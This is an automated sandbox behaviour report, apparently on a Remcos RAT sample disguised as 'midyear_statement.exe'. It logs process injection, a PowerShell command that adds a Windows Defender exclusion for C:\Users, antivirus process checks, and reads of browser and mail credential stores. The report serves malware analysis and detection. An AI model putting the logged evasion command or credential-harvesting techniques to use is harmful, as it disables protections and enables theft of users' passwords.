                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\midyear_statement.exeMemory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFMemory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFMemory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,24_2_123480EF
                      Maps a DLL or memory area into another process
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifSection loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifSection loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifSection loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\midyear_statement.exeMemory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 293008Jump to behavior
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFMemory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 2C2008
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFMemory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 3B2008
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe24_2_123420F7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12349627 mouse_event,24_2_12349627
                      Source: C:\Users\user\Desktop\midyear_statement.exeProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"Jump to behavior
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP5\0
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager"
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager573ef12
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP5\
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP5\22
                      Source: wkrriuhD.pif, 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP5\511
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, logs.dat.24.drBinary or memory string: [Program Manager]
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C5A34 cpuid 24_2_005C5A34
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_040A5A3C
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: GetLocaleInfoA,0_2_040AA708
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: GetLocaleInfoA,0_2_040AA754
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_040A5B48
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoA,24_2_1233F8D1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoW,24_2_12382313
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: EnumSystemLocalesW,24_2_12382036
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_123820C3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_12382610
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_1238243C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: EnumSystemLocalesW,24_2_12378404
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoW,24_2_12382543
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: GetLocaleInfoW,24_2_123788ED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: EnumSystemLocalesW,24_2_12381F50
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: EnumSystemLocalesW,24_2_12381F9B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_12381CD8
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A9150 GetLocalTime,0_2_040A9150
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234B60D GetComputerNameExW,GetUserNameW,24_2_1234B60D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_00401108 GetTimeZoneInformation,24_2_00401108
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040AB6D0 GetVersionExA,0_2_040AB6D0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data24_2_1233BA12
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: \key3.db24_2_1233BB30
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: ESMTPPassword28_2_004033F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword28_2_00402DB3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword28_2_00402DB3
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 8172, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
